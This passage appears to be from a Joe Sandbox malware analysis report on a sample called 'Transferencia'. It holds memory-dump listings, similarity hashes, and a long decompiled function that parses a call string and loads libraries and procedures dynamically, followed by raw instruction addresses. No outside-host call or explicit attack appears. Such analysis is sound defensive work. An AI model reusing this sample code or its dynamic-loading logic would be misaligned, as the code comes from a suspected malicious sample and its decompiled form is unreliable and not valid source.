                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                • API String ID: 2035342205-451766063
                                                • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                                                • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                                                • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                                                • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E732A1BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				void* _t255;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E732A12BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E732A12BB();
                                                				_t321 = E732A12E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t332 = _t255;
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
                                                							 *(_t332 + 0x100c) = _t283;
                                                							 *(_t332 + 4) = _t283;
                                                							if(_t288 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t328 = 0;
                                                								GlobalFree(_t332);
                                                								_t332 = E732A13B1(_v24);
                                                								__eflags = _t332 - _t283;
                                                								if(_t332 == _t283) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t249 =  *(_t332 + 0x1ca0);
                                                									__eflags = _t249 - _t283;
                                                									if(_t249 == _t283) {
                                                										break;
                                                									}
                                                									_t328 = _t332;
                                                									_t332 = _t249;
                                                									__eflags = _t332 - _t283;
                                                									if(_t332 != _t283) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t328 - _t283;
                                                								if(_t328 != _t283) {
                                                									 *(_t328 + 0x1ca0) = _t283;
                                                								}
                                                								_t250 =  *(_t332 + 0x1010);
                                                								__eflags = _t250 & 0x00000008;
                                                								if((_t250 & 0x00000008) == 0) {
                                                									_t251 = _t250 | 0x00000002;
                                                									__eflags = _t251;
                                                									 *(_t332 + 0x1010) = _t251;
                                                								} else {
                                                									_t332 = E732A162F(_t332);
                                                									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t300 = _t288 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									L31:
                                                									lstrcpyW(_t217, _v48);
                                                									L32:
                                                									lstrcpyW(_t322, _v24);
                                                									goto L42;
                                                								}
                                                								_t301 = _t300 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t301 != 1;
                                                								if(_t301 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t215 == 1) {
                                                								_t257 = _v16;
                                                								if(_v40 == _t283) {
                                                									_t257 = _t257 - 1;
                                                								}
                                                								 *(_t332 + 0x1014) = _t257;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 2;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t321 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t258 = _t213 - 0x23;
                                                					if(_t258 == 0) {
                                                						__eflags = _t321 - _v56;
                                                						if(_t321 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t283;
                                                							if(_v44 != _t283) {
                                                								L43:
                                                								_t260 = _v32 - _t283;
                                                								__eflags = _t260;
                                                								if(_t260 == 0) {
                                                									_t261 = _t286;
                                                									while(1) {
                                                										__eflags = _t261 - 0x22;
                                                										if(_t261 != 0x22) {
                                                											break;
                                                										}
                                                										_t321 =  &(_t321[1]);
                                                										__eflags = _v44 - _t283;
                                                										_v12 = _t321;
                                                										if(_v44 == _t283) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 =  *_t321;
                                                											L58:
                                                											_t331 =  &(_t321[1]);
                                                											__eflags = _t331;
                                                											_v12 = _t331;
                                                											goto L59;
                                                										}
                                                										_t261 =  *_t321 & 0x0000ffff;
                                                										_v44 = _t283;
                                                									}
                                                									__eflags = _t261 - 0x2a;
                                                									if(_t261 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t321 = _v12;
                                                										_v28 = _v24;
                                                										_t283 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t261 - 0x2d;
                                                									if(_t261 == 0x2d) {
                                                										L151:
                                                										_t304 =  *_t321;
                                                										__eflags = _t304 - 0x2d;
                                                										if(_t304 != 0x2d) {
                                                											L154:
                                                											_t264 =  &(_t321[1]);
                                                											__eflags =  *_t264 - 0x3a;
                                                											if( *_t264 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t304 - 0x2d;
                                                											if(_t304 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t264;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 = _t283;
                                                											} else {
                                                												 *_v28 = _t283;
                                                												lstrcpyW(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t264 =  &(_t321[1]);
                                                										__eflags =  *_t264 - 0x3e;
                                                										if( *_t264 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t261 - 0x3a;
                                                									if(_t261 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t269 = _t260 - 1;
                                                								__eflags = _t269;
                                                								if(_t269 == 0) {
                                                									L80:
                                                									_t305 = _t286 + 0xffffffde;
                                                									__eflags = _t305 - 0x55;
                                                									if(_t305 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t305 + 0x732a23e8) & 0x000000ff) * 4 +  &M732A235C))) {
                                                										case 0:
                                                											__ecx = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                													L136:
                                                													 *__ecx =  *__ecx & 0x00000000;
                                                													__eax = E732A12CC(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __ax;
                                                												if(__ax == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __ax - __dx;
                                                												if(__ax == __dx) {
                                                													__edi = __edi + 1;
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__ax =  *__edi;
                                                												 *__ecx =  *__edi;
                                                												__ecx = __ecx + 1;
                                                												__ecx = __ecx + 1;
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 2;
                                                											__ebx = E732A12BB();
                                                											 &_v12 = E732A1B86( &_v12);
                                                											__eax = E732A1510(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E732A1B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t271 =  *(_t332 + 0x1014);
                                                											__eflags = _t271 - _v16;
                                                											if(_t271 > _v16) {
                                                												_v16 = _t271;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t271 - (_v36 == 3);
                                                											if(_t271 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E732A1B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(4);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x732a405c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x1018) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x1028) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E732A1B86( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                												_t136 = _v16 + 0x81; // 0x81
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x102c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x1030; // 0x1030
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t272 = _t269 - 1;
                                                								__eflags = _t272;
                                                								if(_t272 == 0) {
                                                									_v16 = _t283;
                                                									goto L80;
                                                								}
                                                								__eflags = _t272 != 1;
                                                								if(_t272 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t286 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t309 = _t286 - 0x72;
                                                									__eflags = _t309;
                                                									if(_t309 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t274);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t332 + 0x1010;
                                                											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t312 = _t309 - 1;
                                                									__eflags = _t312;
                                                									if(_t312 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t312 != 0;
                                                									if(_t312 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t315 = _t286 - 0x21;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t316 = _t315 - 0x11;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t274 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t317 = _t316 - 0x31;
                                                								__eflags = _t317;
                                                								if(_t317 == 0) {
                                                									_t274 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t317 != 0;
                                                								if(_t317 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t283;
                                                								_v36 = _t283;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t283;
                                                						if(_v32 == _t283) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t277 = _t258 - 5;
                                                					if(_t277 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t281 = _t277 - 1;
                                                					if(_t281 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t281 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                					L182:
                                                					return _t332;
                                                				} else {
                                                					_t225 =  *_t332 - 1;
                                                					if(_t225 == 0) {
                                                						_t187 = _t332 + 8; // 0x8
                                                						_t324 = _t187;
                                                						__eflags =  *_t324 - _t283;
                                                						if( *_t324 != _t283) {
                                                							_t226 = GetModuleHandleW(_t324); // executed
                                                							__eflags = _t226 - _t283;
                                                							 *(_t332 + 0x1008) = _t226;
                                                							if(_t226 != _t283) {
                                                								L171:
                                                								_t192 = _t332 + 0x808; // 0x808
                                                								_t325 = _t192;
                                                								_t227 = E732A16BD( *(_t332 + 0x1008), _t325);
                                                								__eflags = _t227 - _t283;
                                                								 *(_t332 + 0x100c) = _t227;
                                                								if(_t227 == _t283) {
                                                									__eflags =  *_t325 - 0x23;
                                                									if( *_t325 == 0x23) {
                                                										_t195 = _t332 + 0x80a; // 0x80a
                                                										_t231 = E732A13B1(_t195);
                                                										__eflags = _t231 - _t283;
                                                										if(_t231 != _t283) {
                                                											__eflags = _t231 & 0xffff0000;
                                                											if((_t231 & 0xffff0000) == 0) {
                                                												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t283;
                                                								if(_v52 != _t283) {
                                                									L178:
                                                									_t325[lstrlenW(_t325)] = 0x57;
                                                									_t229 = E732A16BD( *(_t332 + 0x1008), _t325);
                                                									__eflags = _t229 - _t283;
                                                									if(_t229 != _t283) {
                                                										L166:
                                                										 *(_t332 + 0x100c) = _t229;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t206 = _t332 + 4;
                                                									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                									__eflags =  *_t206;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									if( *(_t332 + 0x100c) != _t283) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t234 = LoadLibraryW(_t324); // executed
                                                							__eflags = _t234 - _t283;
                                                							 *(_t332 + 0x1008) = _t234;
                                                							if(_t234 == _t283) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t332 + 0x808; // 0x808
                                                						_t236 = E732A13B1(_t188);
                                                						 *(_t332 + 0x100c) = _t236;
                                                						__eflags = _t236 - _t283;
                                                						goto L180;
                                                					}
                                                					_t237 = _t225 - 1;
                                                					if(_t237 == 0) {
                                                						_t185 = _t332 + 0x808; // 0x808
                                                						_t238 = _t185;
                                                						__eflags =  *_t238 - _t283;
                                                						if( *_t238 == _t283) {
                                                							goto L182;
                                                						}
                                                						_t229 = E732A13B1(_t238);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t237 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t332 + 8; // 0x8
                                                					_t284 = _t81;
                                                					_t326 = E732A13B1(_t81);
                                                					 *(_t332 + 0x1008) = _t326;
                                                					if(_t326 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1050)) = E732A12CC(_t284);
                                                					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                					_t90 = _t332 + 0x808; // 0x808
                                                					_t229 =  *(_t326->i + E732A13B1(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}


































































                                                0x732a1c07
                                                0x732a1c0a
                                                0x732a1c0d
                                                0x732a1c10
                                                0x732a1c13
                                                0x732a1c16
                                                0x732a1c19
                                                0x732a1c1b
                                                0x732a1c1e
                                                0x732a1c21
                                                0x732a1c26
                                                0x732a1c29
                                                0x732a1c31
                                                0x732a1c39
                                                0x732a1c3b
                                                0x732a1c3e
                                                0x732a1c46
                                                0x732a1c46
                                                0x732a1c4b
                                                0x732a1c4e
                                                0x00000000
                                                0x00000000
                                                0x732a1c5b
                                                0x732a1c60
                                                0x732a1c62
                                                0x732a1cf4
                                                0x732a1cf4
                                                0x732a1cf4
                                                0x732a1cf8
                                                0x732a1cfb
                                                0x732a1cfd
                                                0x732a1d1f
                                                0x732a1d21
                                                0x732a1d24
                                                0x732a1d2d
                                                0x732a1d33
                                                0x732a1d35
                                                0x732a1d3b
                                                0x732a1d3b
                                                0x732a1d41
                                                0x732a1d44
                                                0x732a1d44
                                                0x732a1d47
                                                0x732a1d47
                                                0x732a1d4d
                                                0x732a1d4f
                                                0x732a1d4f
                                                0x732a1d51
                                                0x732a1d54
                                                0x732a1d57
                                                0x732a1d5d
                                                0x732a1d63
                                                0x732a1d66
                                                0x732a1d8a
                                                0x732a1d8d
                                                0x00000000
                                                0x00000000
                                                0x732a1d90
                                                0x732a1d92
                                                0x732a1da0
                                                0x732a1da3
                                                0x732a1da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1da7
                                                0x732a1da7
                                                0x732a1da7
                                                0x732a1dad
                                                0x732a1daf
                                                0x00000000
                                                0x00000000
                                                0x732a1db1
                                                0x732a1db3
                                                0x732a1db5
                                                0x732a1db7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1db7
                                                0x732a1db9
                                                0x732a1dbb
                                                0x732a1dbd
                                                0x732a1dbd
                                                0x732a1dc3
                                                0x732a1dc9
                                                0x732a1dcb
                                                0x732a1ddf
                                                0x732a1ddf
                                                0x732a1de1
                                                0x732a1dcd
                                                0x732a1dd3
                                                0x732a1dd6
                                                0x732a1dd6
                                                0x00000000
                                                0x732a1d68
                                                0x732a1d68
                                                0x732a1d68
                                                0x732a1d69
                                                0x732a1d71
                                                0x732a1d75
                                                0x732a1d7b
                                                0x732a1d7f
                                                0x00000000
                                                0x732a1d7f
                                                0x732a1d6b
                                                0x732a1d6b
                                                0x732a1d6c
                                                0x00000000
                                                0x00000000
                                                0x732a1d6e
                                                0x732a1d6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1d6f
                                                0x732a1cff
                                                0x732a1d00
                                                0x732a1d09
                                                0x732a1d0c
                                                0x732a1d19
                                                0x732a1d19
                                                0x732a1d0e
                                                0x732a1d0e
                                                0x732a1de7
                                                0x732a1dea
                                                0x732a1dee
                                                0x732a1e61
                                                0x732a1e65
                                                0x732a1c43
                                                0x00000000
                                                0x732a1c43
                                                0x00000000
                                                0x732a1e65
                                                0x732a1cfd
                                                0x732a1c68
                                                0x732a1c6b
                                                0x732a1cce
                                                0x732a1cd1
                                                0x732a1ce3
                                                0x732a1ce3
                                                0x732a1ce6
                                                0x732a1df3
                                                0x732a1df6
                                                0x732a1df6
                                                0x732a1df8
                                                0x732a21ae
                                                0x732a21c6
                                                0x732a21c6
                                                0x732a21c9
                                                0x00000000
                                                0x00000000
                                                0x732a21b3
                                                0x732a21b4
                                                0x732a21b7
                                                0x732a21ba
                                                0x732a2244
                                                0x732a224b
                                                0x732a2251
                                                0x732a2255
                                                0x732a1e5c
                                                0x732a1e5d
                                                0x732a1e5d
                                                0x732a1e5e
                                                0x00000000
                                                0x732a1e5e
                                                0x732a21c0
                                                0x732a21c3
                                                0x732a21c3
                                                0x732a21cb
                                                0x732a21ce
                                                0x732a2238
                                                0x732a1e51
                                                0x732a1e54
                                                0x732a1e57
                                                0x732a1e5a
                                                0x732a1e5a
                                                0x00000000
                                                0x732a1e5a
                                                0x732a21d0
                                                0x732a21d3
                                                0x732a21da
                                                0x732a21da
                                                0x732a21dd
                                                0x732a21e1
                                                0x732a21f5
                                                0x732a21f5
                                                0x732a21f8
                                                0x732a21fc
                                                0x00000000
                                                0x00000000
                                                0x732a21fe
                                                0x732a2202
                                                0x00000000
                                                0x00000000
                                                0x732a2204
                                                0x732a220b
